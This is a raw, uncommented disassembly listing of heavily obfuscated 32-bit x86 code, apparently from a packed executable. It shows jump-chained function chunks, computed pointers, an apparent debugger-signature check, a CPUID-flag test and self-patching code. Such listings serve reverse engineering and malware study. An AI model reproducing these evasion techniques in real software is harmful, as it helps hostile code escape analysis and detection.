add ecx, 4
jmp loc_427C36
; END OF FUNCTION CHUNK FOR sub_429E52
; =============== S U B R O U T I N E =======================================
sub_424E36 proc near ; CODE XREF: sub_42CDEB-49A9�p
; _0182ofla:00429A10�j
mov [esp+0], ecx
pop ecx
mov [ecx], eax
call sub_42E841
loc_424E41: ; CODE XREF: sub_426571-F5F�j
jmp nullsub_18
sub_424E36 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424E46: ; CODE XREF: sub_42798F-3D24�j
xchg eax, [esp+8+var_8]
pop eax
xchg ebx, [esp+4+var_4]
call sub_42A6D5
jmp loc_424C0D
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F0F
loc_424E57: ; CODE XREF: sub_428F0F:loc_423ADF�j
jz loc_42CE47
jmp loc_428C4E
; END OF FUNCTION CHUNK FOR sub_428F0F
; =============== S U B R O U T I N E =======================================
sub_424E62 proc near ; CODE XREF: sub_42A642-48BE�j
; _0182ofla:0042AD1B�p
arg_0 = dword ptr 4
xchg eax, [esp+0]
pop eax
xchg ebx, [esp-4+arg_0]
loc_424E69: ; CODE XREF: sub_425629:loc_42351A�j
jmp sub_42D888
sub_424E62 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424E6E proc near ; CODE XREF: sub_426A7F+3�p
; _0182ofla:0042E6F5�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00423141 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 0042390D SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004251A5 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00427B13 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427F98 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00428F3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429B7C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042A548 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D1E0 SIZE 0000000D BYTES
mov [esp+0], edi
pop edi
push ecx
mov esp, ebp
pop ebp
push 0A5D83CF8h
jmp loc_42A548
sub_424E6E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_424E80 proc near ; DATA XREF: sub_427DA9+1867�o
pop ecx
mov eax, [eax]
push offset loc_424421
jmp nullsub_206
sub_424E80 endp
; ---------------------------------------------------------------------------
add ebx, 25B2469Dh
jmp sub_425C55
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_24. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427ED1
loc_424E99: ; CODE XREF: sub_427ED1+1B5A�j
jmp loc_428707
; END OF FUNCTION CHUNK FOR sub_427ED1
; ---------------------------------------------------------------------------
push offset sub_428AC9
jmp loc_425DC0
; ---------------------------------------------------------------------------
push offset loc_429742
jmp loc_42B2FA
; ---------------------------------------------------------------------------
cdq
jmp loc_42E5F2
; ---------------------------------------------------------------------------
dd 6A168A0Fh
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_424EBE proc near ; CODE XREF: sub_429BB9:loc_4230A2�p
mov [esp+0], edi
pop edi
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call eax
jmp loc_427A4D
sub_424EBE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424ED2: ; CODE XREF: sub_42798F:loc_4291CC�j
jz loc_4247ED
jmp loc_426CD2
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426B01
loc_424EDD: ; CODE XREF: sub_426B01:loc_4285CE�j
push 2276A85Dh
pop edi
sub edi, 0B84D112Ah
xor edi, 0F45EB619h
cmp edi, 28D9F729h
jmp loc_42A4C1
; END OF FUNCTION CHUNK FOR sub_426B01
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_424EFA: ; CODE XREF: sub_42798F-319D�j
pop eax
and eax, 0E4CC8704h
add eax, 83C713B3h
add eax, ebp
add eax, 182CE9F1h
cmp dword ptr [eax], 4742444Fh
jmp loc_428F67
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C58A
loc_424F1A: ; CODE XREF: _0182ofla:loc_427FB4�j
; sub_42C58A:loc_428065�j
mov ds:dword_424C18, eax
retn
; END OF FUNCTION CHUNK FOR sub_42C58A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F20
loc_424F21: ; CODE XREF: sub_428F20+53F3�j
jmp loc_423E3C
; END OF FUNCTION CHUNK FOR sub_428F20
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D056
loc_424F26: ; CODE XREF: sub_42E218-946E�j
; sub_42D056-3404�j
rol eax, 7
push ebp
loc_424F2A: ; CODE XREF: sub_423A2A+49DA�j
call sub_42ECF2
loc_424F2F: ; CODE XREF: sub_4267E7+C�j
pushf
jmp loc_42858C
; END OF FUNCTION CHUNK FOR sub_42D056
; =============== S U B R O U T I N E =======================================
sub_424F35 proc near ; DATA XREF: _0182ofla:loc_4292C4�o
; FUNCTION CHUNK AT 0042781F SIZE 00000015 BYTES
lea eax, [ebp-24h]
push eax
push 4
push 3BA6635Eh
pop eax
jmp loc_42781F
sub_424F35 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C553
loc_424F46: ; CODE XREF: sub_42C553:loc_428B3F�j
xor ebp, eax
jmp loc_4241A5
; END OF FUNCTION CHUNK FOR sub_42C553
; ---------------------------------------------------------------------------
loc_424F4D: ; DATA XREF: sub_4298DD:loc_426802�o
jno loc_42476D
push 0B96AE087h
pop eax
sub eax, 0BCE00B87h
add eax, 70B071E5h
add eax, ebp
jmp loc_4250FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426E44
loc_424F6C: ; CODE XREF: sub_426E44+9�j
mov eax, [ebp+var_20]
mov [ebp+var_28], eax
mov [ebp+var_14], 4
mov eax, [ebp+var_14]
mov [ebp+var_4], eax
push offset loc_42DDEE
jmp loc_42C128
; END OF FUNCTION CHUNK FOR sub_426E44
; ---------------------------------------------------------------------------
loc_424F89: ; CODE XREF: _0182ofla:0042DCC0�j
shr esi, 11h
; START OF FUNCTION CHUNK FOR sub_427239
loc_424F8C: ; CODE XREF: sub_427239+30E�j
or edi, 0AFC1929Ah
add edi, 50727CDDh
xchg edi, [esp+8+var_8]
jmp sub_428D17
; END OF FUNCTION CHUNK FOR sub_427239
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
add edx, eax
jmp loc_42A342
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A2A
loc_424FA8: ; CODE XREF: sub_42AC07-3038�j
; sub_423A2A:loc_42B495�j
push 4070D9CCh
pop eax
rol eax, 0Ah
add eax, 3C98CFDFh
push ebx
jmp loc_427B1E
; END OF FUNCTION CHUNK FOR sub_423A2A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4295D6
loc_424FBD: ; CODE XREF: sub_4295D6-5E2F�j
pop eax
add eax, 0BDA87889h
and eax, 0BCCD1B2Eh
add eax, 484130DEh
mov eax, [eax]
or eax, eax
jnz loc_42729C
jmp loc_423F83
; END OF FUNCTION CHUNK FOR sub_4295D6
; ---------------------------------------------------------------------------
byte_424FDF db 0F2h ; CODE XREF: sub_42AA33+C�j
db 0CCh
; ---------------------------------------------------------------------------
jmp loc_426595
; ---------------------------------------------------------------------------
loc_424FE6: ; DATA XREF: _0182ofla:0042B253�o
mov eax, ds:dword_42B8EC
call sub_423EB3
; START OF FUNCTION CHUNK FOR sub_42CCD0
loc_424FF0: ; CODE XREF: sub_42CCD0+A�j
jmp nullsub_230
; END OF FUNCTION CHUNK FOR sub_42CCD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428D63
loc_424FF5: ; CODE XREF: sub_428D63:loc_42D108�j
jz loc_42AF2E
jmp loc_42C75E
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
shr ebx, 0Fh
jmp sub_4251FB
; ---------------------------------------------------------------------------
loc_425008: ; CODE XREF: _0182ofla:0042CF09�j
mov ecx, esp
add ecx, 10h
mov ecx, [ecx]
mov dword ptr [ecx], 10013h
xor eax, eax
add ecx, 4
mov [ecx], eax
jmp loc_42E0AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429AE0
loc_425027: ; CODE XREF: sub_429AE0+D18�j
pushf
pop eax
xor eax, 200000h
loc_42502E: ; CODE XREF: sub_427DA9+257F�j
push eax
jmp loc_427A85
; END OF FUNCTION CHUNK FOR sub_429AE0
; ---------------------------------------------------------------------------
loc_425034: ; CODE XREF: _0182ofla:loc_42C4D3�j
push offset loc_42989C
jmp locret_42B3D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42561D
loc_42503E: ; CODE XREF: sub_42561D:loc_42766D�j
push offset loc_42DB7E
jmp nullsub_96
; END OF FUNCTION CHUNK FOR sub_42561D
; =============== S U B R O U T I N E =======================================
sub_425048 proc near ; DATA XREF: sub_428A08+5�o
; FUNCTION CHUNK AT 0042522E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042DC5F SIZE 00000005 BYTES
push ebp
xchg ecx, ebp
mov esp, ebp
pop ebp
push 0DEC8AA37h
pop eax
jmp loc_42DC5F
sub_425048 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D553
loc_425059: ; CODE XREF: sub_42D553-8E5E�j
call sub_42E43C
; END OF FUNCTION CHUNK FOR sub_42D553
; START OF FUNCTION CHUNK FOR sub_4271D2
loc_42505E: ; CODE XREF: sub_4271D2+204F�j
jmp loc_42B696
; END OF FUNCTION CHUNK FOR sub_4271D2
; =============== S U B R O U T I N E =======================================
sub_425063 proc near ; CODE XREF: sub_42DB2E:loc_424374�p
; _0182ofla:0042C5F6�j
; FUNCTION CHUNK AT 00424677 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00425917 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425EC5 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428FA7 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00429F9E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AC84 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C981 SIZE 00000009 BYTES
mov [esp+0], esi
pop esi
push eax
call sub_4295D6
lea eax, [ebp-0Ch]
push eax
jmp loc_42C981
sub_425063 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423395
loc_425076: ; CODE XREF: sub_423395:loc_42A9F2�j
push 407234B3h
pop eax
jmp loc_42AFFF
; END OF FUNCTION CHUNK FOR sub_423395
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282B8
loc_425081: ; CODE XREF: sub_4282B8-1E21�j
jnz loc_426A59
jmp loc_423131
; END OF FUNCTION CHUNK FOR sub_4282B8
; ---------------------------------------------------------------------------
loc_42508C: ; DATA XREF: sub_426BDA+3825�o
call sub_428D17
mov edx, 17B3C1CFh
call sub_42D71D
call sub_423F65
; START OF FUNCTION CHUNK FOR sub_42340D
loc_4250A0: ; CODE XREF: sub_42340D+11�j
shr edx, 3
mov ecx, ds:dword_423190
movzx edx, byte ptr [ecx+edx]
and eax, edx
jnz loc_42A7D0
jmp loc_427264
; END OF FUNCTION CHUNK FOR sub_42340D
; ---------------------------------------------------------------------------
loc_4250BA: ; DATA XREF: sub_4254D3:loc_42CCB3�o
pop ecx
pop ecx
pop ebp
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428EB9
loc_4250BE: ; CODE XREF: sub_428EB9-1271�j
jmp loc_42E5A5
; END OF FUNCTION CHUNK FOR sub_428EB9
; ---------------------------------------------------------------------------
popf
jmp sub_423360
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_187. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4247FE
loc_4250CA: ; CODE XREF: sub_4247FE+18BA�j
jmp nullsub_25
; END OF FUNCTION CHUNK FOR sub_4247FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42940E
loc_4250CF: ; CODE XREF: sub_42940E+F�j
jnz loc_42AD33
jmp loc_42882A
; END OF FUNCTION CHUNK FOR sub_42940E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E689
loc_4250DA: ; CODE XREF: sub_42E689:loc_42A49F�j
; sub_42E689-2FB9�j
push offset sub_42E9A5
jmp nullsub_175
; END OF FUNCTION CHUNK FOR sub_42E689
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_4250E4: ; CODE XREF: sub_428F46:loc_429FBE�j
mov esp, ebp
pop ebp
push 917DB474h
pop eax
xor eax, 9656E7EAh
or eax, 7019B8B1h
jmp loc_423D28
; END OF FUNCTION CHUNK FOR sub_428F46
; ---------------------------------------------------------------------------
loc_4250FE: ; CODE XREF: _0182ofla:00424F67�j
add eax, 92C4B8F7h
push eax
push 100h
lea eax, [ebp-2C8h]
push eax
jmp loc_4266ED
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C415
loc_425116: ; CODE XREF: sub_42C415:loc_423D23�j
call dword ptr [ebp-4]
test eax, eax
jz loc_429D23
jmp loc_42A3B8
; END OF FUNCTION CHUNK FOR sub_42C415
; =============== S U B R O U T I N E =======================================
sub_425126 proc near ; CODE XREF: _0182ofla:00429052�j
; sub_42905D+9�p
; FUNCTION CHUNK AT 0042E8C8 SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
mov esp, ebp
push offset loc_42B1A8
jmp loc_42E8C8
sub_425126 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4231D5
loc_425136: ; CODE XREF: sub_4231D5:loc_429FA3�j
add eax, [ebp-4]
call sub_4289E4
push offset loc_425FA7
jmp nullsub_85
; END OF FUNCTION CHUNK FOR sub_4231D5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CD44
loc_425148: ; CODE XREF: sub_42CD44+B�j
or edi, 1AACF898h
call sub_423D2D
; END OF FUNCTION CHUNK FOR sub_42CD44
; =============== S U B R O U T I N E =======================================
sub_425153 proc near ; CODE XREF: _0182ofla:00428F33�j
; sub_42B0C0+4�p
mov [esp+0], edi
pop edi
call sub_425C89
sub_425153 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_42E734
loc_42515C: ; CODE XREF: sub_42E734:loc_42CA83�j
push eax
mov eax, esp
call sub_429597
; END OF FUNCTION CHUNK FOR sub_42E734
; START OF FUNCTION CHUNK FOR sub_425E4D
loc_425164: ; CODE XREF: sub_425E4D+A�j
jmp loc_42B048
; END OF FUNCTION CHUNK FOR sub_425E4D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42968B
loc_425169: ; CODE XREF: sub_42968B:loc_4249EA�j
xchg eax, ebp
ror eax, 11h
push ecx
push 0FF7A35AAh
pop ecx
add ecx, 0DB40C953h
or ecx, 0B4858F01h
add ecx, 1824C23h
jmp loc_426071
; END OF FUNCTION CHUNK FOR sub_42968B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425B6E
loc_42518C: ; CODE XREF: sub_425B6E+1BD�j
add eax, 0AFF5F9A1h
loc_425192: ; CODE XREF: sub_425B6E:loc_4255D4�j
push 649A589h
pop eax
xor eax, 8649A58Bh
xor ebx, ebx
jmp loc_42E9BD
; END OF FUNCTION CHUNK FOR sub_425B6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424E6E
loc_4251A5: ; CODE XREF: sub_42662C:loc_426CEA�j
; sub_424E6E:loc_42A548�j
pop eax
add eax, 0E04DBD5Ch
rol eax, 16h
add eax, 6B20C27Ah
mov eax, [eax]
or eax, eax
jnz loc_42D1E0
jmp loc_427B13
; END OF FUNCTION CHUNK FOR sub_424E6E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42461C
loc_4251C4: ; CODE XREF: sub_42461C-885�j
mov [esi], ebp
loc_4251C6: ; CODE XREF: sub_42461C:loc_427D05�j
push edi
push 0F070090Bh
pop edi
add edi, 0FD252CEh
jmp loc_42A5B9
; END OF FUNCTION CHUNK FOR sub_42461C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4298DD
loc_4251D8: ; CODE XREF: sub_4298DD:loc_4268B9�j
jl loc_42731B
or ecx, ebp
jmp loc_429E67
; END OF FUNCTION CHUNK FOR sub_4298DD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423A42
loc_4251E5: ; CODE XREF: sub_423A42+B�j
push offset loc_4261F7
jmp loc_42C123
; END OF FUNCTION CHUNK FOR sub_423A42
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428F46
loc_4251EF: ; CODE XREF: sub_428F46-35A8�j
jg loc_4230C2
jmp loc_426A0E
; END OF FUNCTION CHUNK FOR sub_428F46
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_29. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_4251FB proc near ; CODE XREF: _0182ofla:00425003�j
; sub_428BBF�p
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 004231A9 SIZE 00000005 BYTES
xchg edx, [esp+0]
pop edx
xchg ebp, [esp-4+arg_0]
mov ebp, [esp-4+arg_0]
push offset loc_42E8B0
jmp loc_4231A9
sub_4251FB endp
; ---------------------------------------------------------------------------
popf
jmp sub_42B5CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423127
loc_425215: ; CODE XREF: sub_423127:loc_428C5D�j
mov esi, ecx
xchg esi, [esp+0]
push 0FEA2B2A4h
pop ecx
add ecx, 15D4D60h
xchg ecx, [esp+0]
jmp loc_42A9D3
; END OF FUNCTION CHUNK FOR sub_423127
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425048
loc_42522E: ; CODE XREF: sub_425048:loc_42DC5F�j
add eax, 2179A1E9h
mov eax, [eax]
call sub_42968B
locret_42523B: ; CODE XREF: _0182ofla:0042DDF9�j
retn
; END OF FUNCTION CHUNK FOR sub_425048
; ---------------------------------------------------------------------------
loc_42523C: ; DATA XREF: sub_429D83+B�o
inc ds:dword_42577C
lea eax, nullsub_28
mov byte ptr [eax], 0C3h
call nullsub_2
call sub_4235A0
call nullsub_220
call sub_42DE3A
; START OF FUNCTION CHUNK FOR sub_428D63
loc_42525F: ; CODE XREF: sub_428D63:loc_42726A�j
jmp loc_423B1E
; END OF FUNCTION CHUNK FOR sub_428D63
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429BEC
loc_425264: ; CODE XREF: sub_429BEC-2CEE�j
jmp loc_42335B
; END OF FUNCTION CHUNK FOR sub_429BEC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428A39
loc_425269: ; CODE XREF: sub_428A39-4D5F�j
jl loc_42376B
jg loc_42B6A7
ror esi, 0Fh
jns loc_426D82
xor ebx, 8EBEA48Bh
popf
jmp loc_42376B
; END OF FUNCTION CHUNK FOR sub_428A39
; ---------------------------------------------------------------------------
add edx, edi
jmp sub_42B8A3
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4253F4
loc_425291: ; CODE XREF: sub_4253F4+4A53�j
cmp edi, 80000001h
jbe loc_42D629
jmp loc_4264E3
; END OF FUNCTION CHUNK FOR sub_4253F4
; =============== S U B R O U T I N E =======================================
sub_4252A2 proc near ; DATA XREF: sub_42CCD0+5�o
; FUNCTION CHUNK AT 0042DB98 SIZE 00000004 BYTES
push eax
ror eax, 18h
push edi
push 5A6AE190h
pop edi
and edi, 2A2C290Fh
add edi, 0F61AB024h
jmp loc_42DB98
sub_4252A2 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4252BE: ; CODE XREF: _0182ofla:004262C0�j
jnz loc_425A4A
jmp loc_42DA71
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425EA5
loc_4252C9: ; CODE XREF: sub_425EA5:loc_42D455�j
add edi, 93211F08h
xchg edi, [esp+4+var_4]
jmp nullsub_138
; END OF FUNCTION CHUNK FOR sub_425EA5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427942
loc_4252D7: ; CODE XREF: sub_427942:loc_4287BC�j
xchg ebp, ecx
jmp loc_42ABBD
; END OF FUNCTION CHUNK FOR sub_427942
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A4C6
loc_4252DE: ; CODE XREF: sub_42A4C6:loc_42D244�j
push edx
push 0B0E10612h
pop edx
xor edx, 2597FF75h
add eax, edx
pop edx
mov eax, [eax]
push eax
jmp loc_42DE8A
; END OF FUNCTION CHUNK FOR sub_42A4C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42966F
loc_4252F6: ; CODE XREF: sub_42966F:loc_4275BD�j
pop eax
cmp dword ptr [eax], 0
jnz loc_42967F
jmp sub_42966F
; END OF FUNCTION CHUNK FOR sub_42966F
; =============== S U B R O U T I N E =======================================
sub_425305 proc near ; CODE XREF: sub_4286A8-321E�p
; sub_42966F-2C81�p ...
jnz sub_42DC1F
push offset sub_425A93
jmp nullsub_20
sub_425305 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42798F
loc_425315: ; CODE XREF: sub_42798F+15DE�j
jnz loc_4244E9
jmp loc_42E67D
; END OF FUNCTION CHUNK FOR sub_42798F
; ---------------------------------------------------------------------------
popf
jge loc_42B340
jmp sub_424533
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D9A4
loc_42532C: ; CODE XREF: sub_42D9A4+B�j
mov [esp+0], ecx
mov esp, ebp
pop ebp
push 2695FB79h
pop eax
or eax, 0D661F52Ah
cmp eax, 0AEF332FEh
jmp loc_42977C
; END OF FUNCTION CHUNK FOR sub_42D9A4
; ---------------------------------------------------------------------------
cmp ebx, 0BF9C3CC2h
jmp loc_4236FE
; ---------------------------------------------------------------------------
loc_425354: ; CODE XREF: _0182ofla:0042A2A0�j
call sub_42E648
popf
jmp sub_42CE73
; ---------------------------------------------------------------------------
locret_42535F: ; CODE XREF: _0182ofla:0042C21F�j
retn
; ---------------------------------------------------------------------------
push 0DE9B877Bh
pop edx
xor edx, 0C7544150h
push offset sub_42A6E6
jmp locret_423DDC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_425376: ; CODE XREF: sub_4291BA+C�j
pushf
jmp loc_42CF82
; END OF FUNCTION CHUNK FOR sub_4291BA
; ---------------------------------------------------------------------------
loc_42537C: ; CODE XREF: _0182ofla:0042EAB2�j
add ebx, eax
; =============== S U B R O U T I N E =======================================
sub_42537E proc near ; CODE XREF: sub_42DF61+17�p
; FUNCTION CHUNK AT 004249AD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00426A3E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004272BE SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0042740F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004275AB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00428145 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00428CEF SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429517 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042958F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042A2AC SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042AE55 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C4E5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C5FD SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042C9FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D6F7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E853 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E8E8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EC48 SIZE 0000000B BYTES
xchg ebx, [esp+0]
pop ebx
cmp dword ptr [ebp-4], 0
jz loc_429D23
jmp loc_42C9FD
sub_42537E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_425391: ; DATA XREF: sub_42D8FF:loc_42969C�o
mov edx, [edx+1Ch]
add edx, [ebp-4]
add eax, edx
call sub_423360
; START OF FUNCTION CHUNK FOR sub_4291BA
loc_42539E: ; CODE XREF: sub_4291BA+6AF�j
jmp loc_4255DF
; END OF FUNCTION CHUNK FOR sub_4291BA
; ---------------------------------------------------------------------------
aIurlmGsHofbSi db '‰Uà‹Mìƒá',7,'hŽFÄéI-',0 ; DATA XREF: sub_426046+8�o
align 2
mov eax, 252784E4h
jmp sub_4249EF
; ---------------------------------------------------------------------------
cmp ebp, edx
jmp loc_42EBC4
; ---------------------------------------------------------------------------
loc_4253C7: ; DATA XREF: sub_425BF8-13D6�o
cmp dword ptr [ebp-4], 6
jnz loc_42564E
jmp loc_42AD98
; ---------------------------------------------------------------------------
loc_4253D6: ; CODE XREF: sub_423A61+5�j
call sub_4253DC
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4253DC proc near ; CODE XREF: _0182ofla:loc_4253D6�p
; FUNCTION CHUNK AT 00423BCC SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00423C9E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00424C8A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429480 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00429C93 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042A03C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D2DA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042E9D1 SIZE 00000005 BYTES
push ebp
mov ebp, esp
push ecx
mov esp, ebp
jmp loc_42E9D1
sub_4253DC endp
; ---------------------------------------------------------------------------
test al, al
jz nullsub_203
jmp loc_42821C
; =============== S U B R O U T I N E =======================================
sub_4253F4 proc near ; CODE XREF: _0182ofla:00427173�j
; sub_42798F:loc_427A85�p
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00423554 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00423696 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00423D7D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423DD1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00424D15 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00425291 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00425437 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00425886 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004259A3 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00425C09 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00425E91 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426472 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00426888 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00426C26 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004271FF SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004274F2 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00427814 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00427CCB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042838F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004284AE SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042874C SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00428BC9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004295A5 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00429A30 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00429BC9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00429E34 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0042AC44 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0042B2B6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042B2D9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042B6A2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C6C7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CF2F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042CFA6 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042D5B3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0042D623 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042E075 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E126 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0042E6E8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042EB69 SIZE 00000014 BYTES
xchg eax, [esp+0]
pop eax
popf
pushf
pop eax
xor eax, ecx
jnz loc_42874C
jmp loc_427814
sub_4253F4 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
and edi, eax
jmp sub_425DA5
; ---------------------------------------------------------------------------
loc_42540F: ; DATA XREF: _0182ofla:0042C17C�o
xchg eax, [esp]
retn
